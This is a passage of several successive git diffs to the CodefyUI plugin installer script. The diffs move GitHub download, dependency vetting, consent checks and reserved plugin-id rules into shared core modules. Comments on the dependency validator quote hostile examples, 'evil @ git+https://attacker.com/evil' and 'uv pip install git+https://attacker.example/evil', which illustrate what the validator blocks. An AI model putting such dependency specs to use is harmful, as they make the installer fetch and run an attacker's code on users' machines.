-# ``_install_github`` calls. Anything else in that module is reached through
+# READ here: the two functions through this module's own attributes, so that
+# the install tests replace what ``_install_github`` calls by patching
+# ``plugins.resolve_sha``, and ``USER_AGENT`` by ``_backend_reload`` and by
+# ``scripts/project.py``. Anything else in that module is reached through
 # ``core_github``: a re-export nobody reads is a second name for one rule.
 
 USER_AGENT = core_github.USER_AGENT

--- a/scripts/plugins.py
+++ b/scripts/plugins.py
@@ -43,7 +43,6 @@ from app.core.plugin_loader import (
     MANIFEST_FILENAME,
     clear_removed,
     load_lockfile,
-    mark_removed,
     plugins_builtin_root,
     plugins_user_root,
     removed_ids,
@@ -53,6 +52,7 @@ from app.core.plugins import catalog as core_catalog
 from app.core.plugins import consent as core_consent
 from app.core.plugins import deps as core_deps
 from app.core.plugins import github as core_github
+from app.core.plugins import lifecycle as core_lifecycle
 from app.core.plugins import sources as core_sources
 from app.core.plugins.errors import (
     ConsentRequired,
@@ -1337,29 +1337,28 @@ def _set_enabled(plugin_id: str, enabled: bool) -> int:
 
     Flips the ``enabled`` field on the lockfile entry, persists, and asks
     the running server to hot-reload its registry. Returns CLI exit code.
+
+    The write itself is :func:`core_lifecycle.set_enabled`, which the
+    ``/enable`` and ``/disable`` routes call too; what stays here is the
+    saying-so, in both languages.
     """
     verb_zh = "啟用" if enabled else "停用"
     verb_en = "Enabling" if enabled else "Disabling"
     section(f"{verb_zh}外掛：{plugin_id}", f"{verb_en} plugin: {plugin_id}")
 
-    lockfile = load_lockfile()
-    entry = lockfile.get("plugins", {}).get(plugin_id)
-    if not entry:
+    flipped = core_lifecycle.set_enabled(plugin_id, enabled)
+    if flipped is None:
         err(
             f"找不到外掛 {plugin_id}（請先 install）",
             f"Plugin '{plugin_id}' is not installed (run install first)",
         )
         return 1
 
-    current = entry.get("enabled", True)
-    if current == enabled:
+    if flipped is False:
         state_zh = "已啟用" if enabled else "已停用"
         state_en = "already enabled" if enabled else "already disabled"
         info(f"{plugin_id} {state_zh}（無動作）", f"{plugin_id} is {state_en} (no-op)")
         return 0
-
-    entry["enabled"] = enabled
-    save_lockfile(lockfile)
 
     if _backend_reload():
         ok("熱重載完成", "Hot-reloaded backend")
@@ -1381,39 +1380,33 @@ def cmd_disable(args: argparse.Namespace) -> int:
 
 
 def cmd_uninstall(args: argparse.Namespace) -> int:
+    """Remove a plugin from this install and say what that did.
+
+    The lockfile edit, the ``rmtree`` and the tombstone rule are
+    :func:`core_lifecycle.uninstall_plugin`, so the Plugin Center's delete
+    button and this command remove a plugin in exactly one way. The catalog
+    is read HERE and handed over, because this module's tests fake it by
+    patching ``plugins_builtin_root`` on this module.
+    """
     plugin_id = args.plugin_id.lower()
     section(f"移除外掛：{plugin_id}", f"Uninstalling plugin: {plugin_id}")
 
-    lockfile = load_lockfile()
-    entry = lockfile.get("plugins", {}).get(plugin_id)
-    if not entry:
+    outcome = core_lifecycle.uninstall_plugin(
+        plugin_id, builtin_ids=set(builtin_catalog_packs())
+    )
+    if outcome is None:
         err(f"找不到外掛 {plugin_id}", f"Plugin '{plugin_id}' is not installed")
         return 1
 
-    if entry.get("source_kind") == "github_url":
-        plugin_dir = plugins_user_root() / plugin_id
-        if plugin_dir.exists():
-            try:
-                shutil.rmtree(plugin_dir)
-            except OSError as e:
-                err(f"刪除失敗：{e}", f"Failed to remove {plugin_dir}: {e}")
-                return 1
-
-    lockfile["plugins"].pop(plugin_id, None)
-
-    # Remember the decision instead of merely forgetting the pack (#175).
-    # Popping the entry made "never installed" and "removed on purpose" the
-    # same state, so `cdui plugin sync` would have to either re-install what the
-    # user just threw away or nag about it forever. Only built-in packs are
-    # tombstoned: they are the only ones sync can put back uninvited, and a
-    # tombstone nothing reads is dead data the user would still have to explain.
-    is_builtin = (
-        entry.get("source_kind") == "builtin"
-        or plugin_id in builtin_catalog_packs()
-    )
-    if is_builtin:
-        mark_removed(lockfile, plugin_id, source_kind=entry.get("source_kind"))
-    save_lockfile(lockfile)
+    if outcome.files_removed is False:
+        # The entry is gone either way, so the plugin stops loading; what is
+        # left is a directory nobody will look at again. Windows holding a
+        # file open is the usual cause, exactly as in `cdui packs remove`.
+        warn(
+            f"檔案未能刪除，請手動移除：{plugins_user_root() / plugin_id}",
+            f"Could not delete the plugin files; remove them by hand: "
+            f"{plugins_user_root() / plugin_id}",
+        )
 
     if _backend_reload():
         ok("熱重載完成", "Hot-reloaded backend")
@@ -1421,12 +1414,12 @@ def cmd_uninstall(args: argparse.Namespace) -> int:
         info("伺服器未運行", "Server not running")
 
     ok(f"已移除 {plugin_id}", f"Removed {plugin_id}")
-    if is_builtin:
+    if outcome.tombstoned:
         info(
             f"cdui plugin sync 不會再把 {plugin_id} 裝回來；"
-            f"要拿回它請執行 cdui plugin install {plugin_id}",
+            f"要拿回它請執行 {outcome.reinstall_hint}",
             f"`cdui plugin sync` will not bring {plugin_id} back. When you want "
-            f"it again, run `cdui plugin install {plugin_id}`.",
+            f"it again, run `{outcome.reinstall_hint}`.",
         )
     return 0
 

--- a/scripts/plugins.py
+++ b/scripts/plugins.py
@@ -228,11 +228,16 @@ def available_builtin_packs() -> list[tuple[str, str]]:
     """Built-in packs shipped on disk that this install has made no decision about.
 
     See :func:`app.core.plugins.catalog.available_builtin_packs` — the rule,
-    and why a pack the user uninstalled is not "available", live there.
+    and why a pack the user uninstalled is not "available", live there. What
+    is here is the reading: both documents come from this module's own
+    loaders (so a test that fakes them is what gets read), and a failure to
+    read either is swallowed, because every caller is on its way to printing
+    a notice and a notice must never take the command down with it.
     """
-    return core_catalog.available_builtin_packs(
-        read_catalog=load_catalog, read_lockfile=load_lockfile
-    )
+    try:
+        return core_catalog.available_builtin_packs(load_catalog(), load_lockfile())
+    except Exception:  # never let discoverability break a caller
+        return []
 
 
 # ── source parsing ─────────────────────────────────────────────────────────
@@ -287,9 +292,7 @@ def parse_source(spec: str) -> tuple[str, str, str, str]:
     """
     catalog = load_catalog()
     try:
-        parsed = core_sources.parse_source(
-            spec, catalog=catalog, catalog_path=_catalog_path()
-        )
+        parsed = core_sources.parse_source(spec, catalog=catalog)
     except UnknownCatalogName as e:
         raise _unknown_catalog_name(spec, list(e.known)) from None
     except UnparseableSource:

--- a/scripts/plugins.py
+++ b/scripts/plugins.py
@@ -753,28 +753,41 @@ def _install_catalog(plugin_id: str, args, lockfile) -> int:
     return 0
 
 
+#: The zh-TW half of each reason :func:`core_catalog.reserved_id_holder`
+#: gives. The DECISION is the core function's -- one owner, so the CLI and
+#: the install routes cannot come to disagree about which ids are taken --
+#: and what is here is this module's other language for it. A reason with no
+#: translation falls back to the English rather than to silence.
+_RESERVED_ZH = {
+    core_catalog.RESERVED_BY_ROUTE: "/api/plugins/ 底下的路由",
+    core_catalog.RESERVED_BY_BUILTIN_PACK: "CodefyUI 內建的外掛包",
+}
+
+
 def _locally_reserved_reason(plugin_id: str) -> tuple[str, str] | None:
     """What this build owns *plugin_id* with, or ``None`` when nothing does.
 
     The half of the reserved-id rule that does not depend on where the code
     came from: a route under ``/api/plugins/`` is decided by the router and a
     shipped pack by the built-in directory, so no source -- a repository, a
-    local checkout -- can be given one of those ids.
+    local checkout, a scaffold -- can be given one of those ids. Asked by
+    passing no repository, which is what makes
+    :func:`core_catalog.reserved_id_holder` stop after those two clauses.
 
     A ``github`` catalog id is deliberately NOT here, because the answer
     depends on the source: :func:`_reserved_id_refusal` allows only the
-    repository the catalog names, while :func:`_link_local` allows any
-    directory, since a link is the developer's own copy of that repository.
+    repository the catalog names, while :func:`_link_local` and ``new`` allow
+    it outright -- a link is the developer's own copy of that repository, and
+    a scaffold is a new directory that has not been installed anywhere.
 
     Returns the bilingual noun phrase naming the holder, so each caller can
-    keep its own sentence around it.
+    keep its own sentence around it. The catalog is passed in from this
+    module's own reader, because the CLI's tests fake it there.
     """
-    if plugin_id in core_catalog.RESERVED_PLUGIN_IDS:
-        return ("/api/plugins/ 底下的路由", "a route under /api/plugins/")
-    entry = catalog_entry(plugin_id)
-    if entry is not None and entry.kind == "builtin":
-        return ("CodefyUI 內建的外掛包", "a pack that ships with CodefyUI")
-    return None
+    reason = core_catalog.reserved_id_holder(plugin_id, catalog=catalog_entries())
+    if reason is None:
+        return None
+    return (_RESERVED_ZH.get(reason, reason), reason)
 
 
 def _malformed_catalog_row(plugin_id: str) -> tuple[str, str]:
@@ -813,6 +826,11 @@ def _reserved_id_refusal(
     only for a DIFFERENT repository -- the id is what the lockfile, the
     catalog card and the route all key on, and a fork claiming it would
     quietly take the official pack's place.
+
+    Every one of those three comparisons is
+    :func:`core_catalog.reserved_id_holder`'s; this function asks it twice --
+    once without a repository for the sentence the first two share, once with
+    -- and writes the sentences. Nothing here decides.
     """
     reason = _locally_reserved_reason(plugin_id)
     if reason is not None:
@@ -821,20 +839,22 @@ def _reserved_id_refusal(
             f"外掛 id {plugin_id} 是保留名稱（{zh}），不能安裝。",
             f"Plugin id '{plugin_id}' is reserved by this build ({en}).",
         )
+    if core_catalog.reserved_id_holder(
+        plugin_id, owner=owner, repo=repo, catalog=catalog_entries()
+    ) is None:
+        return None
+    # Nothing local owns the id and the answer is still "reserved", so the
+    # remaining clause is the ``github`` row's -- and the repository it names
+    # is what the sentence is about.
     entry = catalog_entry(plugin_id)
-    if (
-        entry is not None
-        and entry.kind == "github"
-        and f"{owner}/{repo}".lower() != (entry.repo or "").lower()
-    ):
-        return (
-            f"外掛 id {plugin_id} 在目錄中屬於 {entry.repo}；"
-            f"只有該儲存庫可以用這個 id 安裝，{owner}/{repo} 不行。",
-            f"Plugin id '{plugin_id}' belongs to {entry.repo} in this "
-            f"install's catalog; only that repository may install under it, "
-            f"not {owner}/{repo}.",
-        )
-    return None
+    holder = entry.repo if entry is not None else ""
+    return (
+        f"外掛 id {plugin_id} 在目錄中屬於 {holder}；"
+        f"只有該儲存庫可以用這個 id 安裝，{owner}/{repo} 不行。",
+        f"Plugin id '{plugin_id}' belongs to {holder} in this "
+        f"install's catalog; only that repository may install under it, "
+        f"not {owner}/{repo}.",
+    )
 
 
 def _install_github(
@@ -2046,10 +2066,18 @@ def cmd_new(args: argparse.Namespace) -> int:
             f"Invalid plugin id {plugin_id!r} (must match {PLUGIN_ID_RE.pattern})",
         )
         return 2
-    if plugin_id in load_catalog().get("plugins", {}):
+    # The same two clauses ``link`` refuses, and for the same reason: a route
+    # name and a pack that ships here are decided by the router and the
+    # built-in directory, so a plugin scaffolded under one could never be
+    # installed. A ``github`` catalog id is allowed -- that is the id the
+    # author of an official plugin scaffolds their own repository under, and
+    # `new` puts a directory on this disk rather than claiming anything.
+    reason = _locally_reserved_reason(plugin_id)
+    if reason is not None:
+        zh, en = reason
         err(
-            f"id '{plugin_id}' 與內建套件保留名稱衝突，請換一個",
-            f"id '{plugin_id}' is reserved by the built-in catalog — pick another",
+            f"id '{plugin_id}' 與{zh}衝突，請換一個",
+            f"id '{plugin_id}' collides with {en} — pick another",
         )
         return 2
     if not _TEMPLATE_ROOT.is_dir():

--- a/scripts/plugins.py
+++ b/scripts/plugins.py
@@ -21,9 +21,7 @@ which ``security.allowed_modules`` the user accepted.
 from __future__ import annotations
 
 import argparse
-import json
 import os
-import re
 import shutil
 import subprocess
 import sys
@@ -52,8 +50,17 @@ from app.core.plugin_loader import (
     save_lockfile,
 )
 from app.core.plugins import catalog as core_catalog
+from app.core.plugins import consent as core_consent
+from app.core.plugins import deps as core_deps
+from app.core.plugins import github as core_github
 from app.core.plugins import sources as core_sources
-from app.core.plugins.errors import UnknownCatalogName, UnparseableSource
+from app.core.plugins.errors import (
+    ConsentRequired,
+    GitHubError,
+    PluginInstallError,
+    UnknownCatalogName,
+    UnparseableSource,
+)
 # The rules live in ``app.core.plugins`` so that the server can read them too;
 # what follows is this module keeping the names it has always exported. The
 # ``X as X`` spelling on the ones this file never calls itself is the
@@ -312,52 +319,18 @@ def parse_source(spec: str) -> tuple[str, str, str, str]:
 
 
 # ── GitHub helpers ─────────────────────────────────────────────────────────
+#
+# Plain re-exports, not wrappers: the request rules (the token header, the two
+# shapes of failure, the size cap) live in ``app.core.plugins.github`` so the
+# server obeys them too. They keep their names here because these are the
+# attributes the install tests replace to stay off the network -- patching
+# ``plugins.resolve_sha`` has to be what ``_install_github`` calls.
 
-USER_AGENT = "cdui-plugin-installer/0.1"
-MAX_TARBALL_BYTES = 100 * 1024 * 1024  # 100 MB
-
-
-def _gh_get(url: str, timeout: float = 30.0) -> bytes:
-    req = urllib.request.Request(url, headers={"User-Agent": USER_AGENT})
-    with urllib.request.urlopen(req, timeout=timeout) as resp:
-        return resp.read()
-
-
-def resolve_sha(owner: str, repo: str, ref: str) -> str:
-    """Convert tag / branch / short-sha to a full 40-char SHA."""
-    target = ref or "HEAD"
-    url = f"https://api.github.com/repos/{owner}/{repo}/commits/{target}"
-    try:
-        data = json.loads(_gh_get(url))
-    except HTTPError as e:
-        raise RuntimeError(
-            f"GitHub API returned {e.code} for {owner}/{repo}@{target}: {e.reason}"
-        ) from e
-    except URLError as e:
-        raise RuntimeError(f"GitHub API request failed: {e.reason}") from e
-    sha = data.get("sha")
-    if not sha:
-        raise RuntimeError(
-            f"GitHub API response for {owner}/{repo}@{target} is missing 'sha'"
-        )
-    return sha
-
-
-def download_tarball(owner: str, repo: str, sha: str, dest: Path) -> None:
-    url = f"https://codeload.github.com/{owner}/{repo}/tar.gz/{sha}"
-    req = urllib.request.Request(url, headers={"User-Agent": USER_AGENT})
-    bytes_read = 0
-    with urllib.request.urlopen(req, timeout=60.0) as resp, dest.open("wb") as fout:
-        while True:
-            chunk = resp.read(64 * 1024)
-            if not chunk:
-                break
-            bytes_read += len(chunk)
-            if bytes_read > MAX_TARBALL_BYTES:
-                raise RuntimeError(
-                    f"Tarball exceeds {MAX_TARBALL_BYTES // (1024 * 1024)} MB limit."
-                )
-            fout.write(chunk)
+USER_AGENT = core_github.USER_AGENT
+MAX_TARBALL_BYTES = core_github.MAX_TARBALL_BYTES
+_gh_get = core_github._gh_get
+resolve_sha = core_github.resolve_sha
+download_tarball = core_github.download_tarball
 
 
 # ── runtime helpers ────────────────────────────────────────────────────────
@@ -445,48 +418,14 @@ def _backend_reload() -> bool:
         return False
 
 
-# PEP 508 distribution names: letters / digits / underscore / hyphen / period.
-# Anything else (especially ``@``, ``git+``, ``http``, whitespace, semicolon)
-# is rejected to block supply-chain RCE via the dep installer
-# (``"evil @ git+https://attacker.com/evil"`` → ``uv pip install`` runs the
-# attacker's ``setup.py`` regardless of how strict the AST gate is).
-_SAFE_DEP_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,62}$")
-
-# PEP 440 version specifier characters. We don't fully parse — we just refuse
-# anything that *isn't* whitespace, digits, dots, commas, parens, and the
-# canonical comparison operators.
-_SAFE_DEP_VERSION = re.compile(r"^[\s\d.,()<>=!~*+a-zA-Z\-]*$")
-
-
-class _UnsafeDepSpec(ValueError):
-    """Raised when a plugin manifest's python_deps entry isn't a plain
-    distribution name + version constraint."""
-
-
-def _build_dep_spec(name: str, ver: str) -> str:
-    """Turn a (name, version) pair into a vetted ``foo==1.2.3``-style string.
-
-    Rejects PEP 508 extras (``foo[extra]``), URL specifiers (``foo @ url``),
-    and any name with non-distribution-safe characters. Returning the spec as
-    a list element for ``uv pip install`` is safe because we never invoke a
-    shell — but ``uv`` itself would happily fetch ``git+`` URLs given the
-    chance, and that's exactly what we're blocking here.
-    """
-    if not isinstance(name, str) or not _SAFE_DEP_NAME.match(name):
-        raise _UnsafeDepSpec(
-            f"Invalid python_deps name {name!r} — must match {_SAFE_DEP_NAME.pattern!r}"
-        )
-    if not isinstance(ver, str):
-        ver = ""
-    if ver and not _SAFE_DEP_VERSION.match(ver):
-        raise _UnsafeDepSpec(
-            f"Invalid python_deps version constraint for {name!r}: {ver!r}"
-        )
-    if not ver:
-        return name
-    if ver[:1] in (">", "<", "=", "~", "!"):
-        return f"{name}{ver}"
-    return f"{name}=={ver}"
+# The vetting that keeps a manifest's ``[python_deps]`` from becoming
+# ``uv pip install git+https://attacker.example/evil``; the rule and its
+# reasoning live in ``app.core.plugins.deps``. Re-exported under the names
+# this module has always had.
+_SAFE_DEP_NAME = core_deps._SAFE_DEP_NAME
+_SAFE_DEP_VERSION = core_deps._SAFE_DEP_VERSION
+_UnsafeDepSpec = core_deps._UnsafeDepSpec
+_build_dep_spec = core_deps._build_dep_spec
 
 
 def _install_deps(deps: dict[str, str]) -> int:
@@ -500,13 +439,11 @@ def _install_deps(deps: dict[str, str]) -> int:
     fail with "No virtual environment found". Pinning ``--python`` removes the
     cwd dependency.
     """
-    specs: list[str] = []
-    for name, ver in deps.items():
-        try:
-            specs.append(_build_dep_spec(name, ver))
-        except _UnsafeDepSpec as e:
-            err(str(e), str(e))
-            return 1
+    try:
+        specs = core_deps.dep_specs(deps)
+    except PluginInstallError as e:
+        err(str(e), str(e))
+        return 1
     cmd = ["uv", "pip", "install", "--python", sys.executable, *specs]
     info(
         f"執行：{' '.join(cmd)}",
@@ -566,6 +503,11 @@ def capability_gate(
     The declared set is checked against this build's vocabulary first;
     ``validate_manifest`` already refuses an unknown name, so reaching one
     here means a caller skipped it, and refusing is the safe reading.
+
+    Which capabilities are covered, and which are new since the version the
+    user consented to, is :func:`app.core.plugins.consent.decide_capabilities`
+    -- the same arithmetic a dialog will do. What is here is the
+    conversation: the printing, the prompt, and the refusal.
     """
     requested = manifest_capabilities(manifest)
     if not requested:
@@ -581,11 +523,15 @@ def capability_gate(
         )
         return CAPABILITIES_REFUSED
 
-    prior = set(normalize_capabilities(getattr(args, "prior_capabilities", None)))
-    if set(requested) <= prior:
+    # ``None`` rather than an empty tuple when there is no record: "installed
+    # before and granted nothing" and "never installed" differ, and only the
+    # first makes an unchanged request into growth worth warning about.
+    prior = normalize_capabilities(getattr(args, "prior_capabilities", None))
+    decision = core_consent.decide_capabilities(requested, prior=prior or None)
+    if not decision.missing:
         info(
-            f"沿用先前授權的能力：{', '.join(requested)}",
-            f"Re-using previously granted capabilities: {', '.join(requested)}",
+            f"沿用先前授權的能力：{', '.join(decision.granted)}",
+            f"Re-using previously granted capabilities: {', '.join(decision.granted)}",
         )
         return requested
 
@@ -597,11 +543,9 @@ def capability_gate(
         "A capability is a declaration, not a sandbox: once granted, the "
         "plugin may use that group of modules and CodefyUI stops asking.",
     )
-    if prior:
-        warn(
-            f"這次比上次多要了：{', '.join(sorted(set(requested) - prior))}",
-            f"This is more than last time: {', '.join(sorted(set(requested) - prior))}",
-        )
+    if decision.grew:
+        grew = ", ".join(sorted(decision.grew))
+        warn(f"這次比上次多要了：{grew}", f"This is more than last time: {grew}")
 
     if getattr(args, "accept_capabilities", False):
         ok(
@@ -797,17 +741,10 @@ def _install_github(owner: str, repo: str, ref: str, args, lockfile) -> int:
         extracted = Path(tmpd) / "extracted"
         extracted.mkdir()
         try:
-            with tarfile.open(tar, "r:gz") as tf:
-                tf.extractall(extracted, filter="data")
-        except tarfile.TarError as e:
+            root = core_github.extract_tarball(tar, extracted)
+        except (tarfile.TarError, PluginInstallError) as e:
             err(f"解壓失敗：{e}", f"Extraction failed: {e}")
             return 1
-
-        roots = [p for p in extracted.iterdir() if p.is_dir()]
-        if not roots:
-            err("壓縮檔內容為空", "Tarball is empty")
-            return 1
-        root = roots[0]
 
         try:
             manifest = read_manifest(root)
@@ -827,10 +764,14 @@ def _install_github(owner: str, repo: str, ref: str, args, lockfile) -> int:
 
         plugin_id = manifest["plugin"]["id"]
         allowed = manifest.get("security", {}).get("allowed_modules") or []
-        if allowed and not args.trust_author:
+        try:
+            core_consent.check_trust(allowed, trust_author=args.trust_author)
+        except ConsentRequired as e:
+            asked = ", ".join(e.allowed_modules)
             err(
-                f"外掛要求白名單以外的模組：{', '.join(allowed)}。加 --trust-author 同意。",
-                f"Plugin requests non-default modules: {', '.join(allowed)}. Pass --trust-author to accept.",
+                f"外掛要求白名單以外的模組：{asked}。加 --trust-author 同意。",
+                f"Plugin requests non-default modules: {asked}. "
+                f"Pass --trust-author to accept.",
             )
             return 1
 
@@ -1603,10 +1544,10 @@ def cmd_info(args: argparse.Namespace) -> int:
     except RuntimeError as e:
         err(str(e), str(e))
         return 1
-    raw = f"https://raw.githubusercontent.com/{owner}/{repo}/{sha}/cdui.plugin.toml"
     try:
-        manifest = tomllib.loads(_gh_get(raw).decode("utf-8"))
-    except (HTTPError, URLError, tomllib.TOMLDecodeError, UnicodeDecodeError) as e:
+        manifest = tomllib.loads(core_github.fetch_manifest_text(owner, repo, sha))
+    except (GitHubError, tomllib.TOMLDecodeError, UnicodeDecodeError) as e:
+        raw = f"https://raw.githubusercontent.com/{owner}/{repo}/{sha}/{MANIFEST_FILENAME}"
         err(f"無法取得 manifest：{e}", f"Could not fetch manifest from {raw}: {e}")
         return 1
     synthetic_entry = {

--- a/scripts/plugins.py
+++ b/scripts/plugins.py
@@ -649,16 +649,18 @@ def _install_by_catalog_name(plugin_id: str, args, lockfile) -> int:
     have the same id.
     """
     entry = catalog_entry(plugin_id)
-    if entry is not None and entry.kind == "github":
+    if entry is None:
+        # Named by the raw catalog and dropped by the validator: not a
+        # built-in pack, whatever it was meant to be. Falling through to the
+        # built-in installer would report "no manifest on disk" for a row
+        # whose actual problem is a missing ``repo`` two lines away.
+        err(*_malformed_catalog_row(plugin_id))
+        return 1
+    if entry.kind == "github":
         owner, _, repo = (entry.repo or "").partition("/")
         return _install_github(
             owner, repo, entry.ref, args, lockfile, catalog_id=entry.id
         )
-    # Either a builtin row or one ``validate_catalog`` dropped. The second is
-    # deliberately not a separate refusal: the builtin path already stops on a
-    # pack with no manifest on disk, which is exactly what a malformed row
-    # leaves behind, and a corrupt catalog must not grow its own vocabulary of
-    # errors that only a hand-edited registry.json can reach.
     return _install_catalog(plugin_id, args, lockfile)
 
 
@@ -751,34 +753,75 @@ def _install_catalog(plugin_id: str, args, lockfile) -> int:
     return 0
 
 
+def _locally_reserved_reason(plugin_id: str) -> tuple[str, str] | None:
+    """What this build owns *plugin_id* with, or ``None`` when nothing does.
+
+    The half of the reserved-id rule that does not depend on where the code
+    came from: a route under ``/api/plugins/`` is decided by the router and a
+    shipped pack by the built-in directory, so no source -- a repository, a
+    local checkout -- can be given one of those ids.
+
+    A ``github`` catalog id is deliberately NOT here, because the answer
+    depends on the source: :func:`_reserved_id_refusal` allows only the
+    repository the catalog names, while :func:`_link_local` allows any
+    directory, since a link is the developer's own copy of that repository.
+
+    Returns the bilingual noun phrase naming the holder, so each caller can
+    keep its own sentence around it.
+    """
+    if plugin_id in core_catalog.RESERVED_PLUGIN_IDS:
+        return ("/api/plugins/ 底下的路由", "a route under /api/plugins/")
+    entry = catalog_entry(plugin_id)
+    if entry is not None and entry.kind == "builtin":
+        return ("CodefyUI 內建的外掛包", "a pack that ships with CodefyUI")
+    return None
+
+
+def _malformed_catalog_row(plugin_id: str) -> tuple[str, str]:
+    """The bilingual refusal for a catalog row ``validate_catalog`` dropped.
+
+    Reachable because the two readers disagree on purpose: ``parse_source``
+    matches the raw ``registry.json`` (so a name the file lists is never
+    "unknown"), while the installer dispatches on a VALIDATED row (so a
+    ``github`` entry really does carry an ``owner/repo``). A row that is in
+    one and not the other is named but not installable, and saying which of
+    those it is beats either half on its own.
+
+    Not silently treated as a built-in pack: the two kinds install by
+    completely different code, and guessing which one a malformed row meant
+    is the question :mod:`app.core.plugins.catalog` refuses to answer.
+    """
+    return (
+        f"目錄項目 {plugin_id} 格式有誤，這份安裝無法使用它。"
+        f"上面的 catalog 警告訊息會指出是哪個欄位；該項目位於 {_catalog_path()}",
+        f"The catalog entry for '{plugin_id}' is malformed, so this install "
+        f"cannot use it. The catalog reader logs which field is wrong; the "
+        f"row is in {_catalog_path()}",
+    )
+
+
 def _reserved_id_refusal(
     plugin_id: str, owner: str, repo: str
 ) -> tuple[str, str] | None:
     """The bilingual refusal for an id ``owner/repo`` may not use, else ``None``.
 
     Three kinds of id are refused, and the third is the one worth spelling
-    out. An id is taken if it names a route under ``/api/plugins/`` (the
-    router, not the plugin, would decide which one answers) or a pack that
-    ships with CodefyUI (the built-in directory would decide). A ``github``
-    catalog id is different: that row IS a repository, so refusing it would
-    make the official pack the catalog advertises the one thing nobody can
-    install. So it is refused only for a DIFFERENT repository -- the id is
-    what the lockfile, the catalog card and the route all key on, and a fork
-    claiming it would quietly take the official pack's place.
+    out. Two of them belong to this build whoever is installing (see
+    :func:`_locally_reserved_reason`). A ``github`` catalog id is different:
+    that row IS a repository, so refusing it would make the official pack the
+    catalog advertises the one thing nobody can install. So it is refused
+    only for a DIFFERENT repository -- the id is what the lockfile, the
+    catalog card and the route all key on, and a fork claiming it would
+    quietly take the official pack's place.
     """
+    reason = _locally_reserved_reason(plugin_id)
+    if reason is not None:
+        zh, en = reason
+        return (
+            f"外掛 id {plugin_id} 是保留名稱（{zh}），不能安裝。",
+            f"Plugin id '{plugin_id}' is reserved by this build ({en}).",
+        )
     entry = catalog_entry(plugin_id)
-    if plugin_id in core_catalog.RESERVED_PLUGIN_IDS:
-        return (
-            f"外掛 id {plugin_id} 是保留名稱（/api/plugins/ 底下的路由），不能安裝。",
-            f"Plugin id '{plugin_id}' is reserved by this build "
-            f"(a route under /api/plugins/).",
-        )
-    if entry is not None and entry.kind == "builtin":
-        return (
-            f"外掛 id {plugin_id} 是保留名稱（CodefyUI 內建的外掛包），不能安裝。",
-            f"Plugin id '{plugin_id}' is reserved by this build "
-            f"(a pack that ships with CodefyUI).",
-        )
     if (
         entry is not None
         and entry.kind == "github"
@@ -1414,10 +1457,19 @@ def _link_local(root: Path, *, force: bool) -> int:
 
     plugin_id = manifest["plugin"]["id"]
 
-    if plugin_id in load_catalog().get("plugins", {}):
+    # Only the ids this build owns outright. A ``github`` catalog id is NOT
+    # one of them here: linking is how the author of an official plugin works
+    # on it, so `cdui plugin link ./CodefyUI-Plugin-Official` has to be able
+    # to carry the id the catalog lists that repository under. There is no
+    # repository to compare a local directory against, and none is wanted --
+    # a link points at the developer's own working tree, and nothing is
+    # downloaded or trusted on the strength of the name.
+    reason = _locally_reserved_reason(plugin_id)
+    if reason is not None:
+        zh, en = reason
         err(
-            f"id '{plugin_id}' 與內建套件衝突，請在 manifest 改用其他 id",
-            f"id '{plugin_id}' collides with a built-in pack — rename it in the manifest",
+            f"id '{plugin_id}' 與{zh}衝突，請在 manifest 改用其他 id",
+            f"id '{plugin_id}' collides with {en} — rename it in the manifest",
         )
         return 1
 
@@ -1650,7 +1702,13 @@ def cmd_info(args: argparse.Namespace) -> int:
     owner, repo = a, b
     if kind == "catalog":
         catalog_row = catalog_entry(a)
-        if catalog_row is not None and catalog_row.kind == "github":
+        if catalog_row is None:
+            # Same disagreement between the two readers as in the installer,
+            # and the same answer: a row this build cannot install is not a
+            # row it can describe either.
+            err(*_malformed_catalog_row(a))
+            return 1
+        if catalog_row.kind == "github":
             # The catalog's own words first, then the live repository. In that
             # order because the catalog answers "is this the pack I meant, and
             # does CodefyUI vouch for it" even when the network half below

--- a/scripts/plugins.py
+++ b/scripts/plugins.py
@@ -288,7 +288,11 @@ def _unknown_catalog_name(spec: str, known: list[str]) -> ValueError:
             f"這份安裝的內建外掛目錄裡沒有 {spec!r}。",
             f"No plugin pack named {spec!r} in this install's catalog.",
         ),
-        t(f"目前可裝的內建包：{have}", f"Built-in packs available here: {have}"),
+        # "Built-in" was true when the catalog held nothing else. It now
+        # lists the official GitHub packs too, and a heading that calls them
+        # built-in tells a reader who just typed one of their names that they
+        # are looking at the wrong list.
+        t(f"目前可裝的套件：{have}", f"Available packs here: {have}"),
     ]
     if not known:
         lines.append(
@@ -344,13 +348,13 @@ def parse_source(spec: str) -> tuple[str, str, str, str]:
 #
 # Plain re-exports, not wrappers: the request rules (the token header, the two
 # shapes of failure, the size cap) live in ``app.core.plugins.github`` so the
-# server obeys them too. They keep their names here because these are the
-# attributes the install tests replace to stay off the network -- patching
-# ``plugins.resolve_sha`` has to be what ``_install_github`` calls.
+# server obeys them too. These three keep their names here because they are
+# what this module CALLS, and the install tests replace them to stay off the
+# network -- patching ``plugins.resolve_sha`` has to be what
+# ``_install_github`` calls. Anything else in that module is reached through
+# ``core_github``: a re-export nobody reads is a second name for one rule.
 
 USER_AGENT = core_github.USER_AGENT
-MAX_TARBALL_BYTES = core_github.MAX_TARBALL_BYTES
-_gh_get = core_github._gh_get
 resolve_sha = core_github.resolve_sha
 download_tarball = core_github.download_tarball
 
@@ -440,18 +444,13 @@ def _backend_reload() -> bool:
         return False
 
 
-# The vetting that keeps a manifest's ``[python_deps]`` from becoming
-# ``uv pip install git+https://attacker.example/evil``; the rule and its
-# reasoning live in ``app.core.plugins.deps``. Re-exported under the names
-# this module has always had.
-_SAFE_DEP_NAME = core_deps._SAFE_DEP_NAME
-_SAFE_DEP_VERSION = core_deps._SAFE_DEP_VERSION
-_UnsafeDepSpec = core_deps._UnsafeDepSpec
-_build_dep_spec = core_deps._build_dep_spec
-
-
 def _install_deps(deps: dict[str, str]) -> int:
     """Install ``python_deps`` via ``uv pip`` into the codefyui venv.
+
+    The vetting that keeps a manifest's ``[python_deps]`` from becoming
+    ``uv pip install git+https://attacker.example/evil`` is
+    :func:`app.core.plugins.deps.dep_specs`; every spec this command runs
+    comes back through it.
 
     Targets the current interpreter explicitly with ``--python sys.executable``.
     ``cdui``/``dev.py`` re-exec into ``backend/.venv`` before running plugin
@@ -545,9 +544,15 @@ def capability_gate(
         )
         return CAPABILITIES_REFUSED
 
-    # ``None`` rather than an empty tuple when there is no record: "installed
-    # before and granted nothing" and "never installed" differ, and only the
-    # first makes an unchanged request into growth worth warning about.
+    # ``decide_capabilities`` tells "installed before and granted nothing"
+    # (``()``) from "never installed" (``None``), because only the first
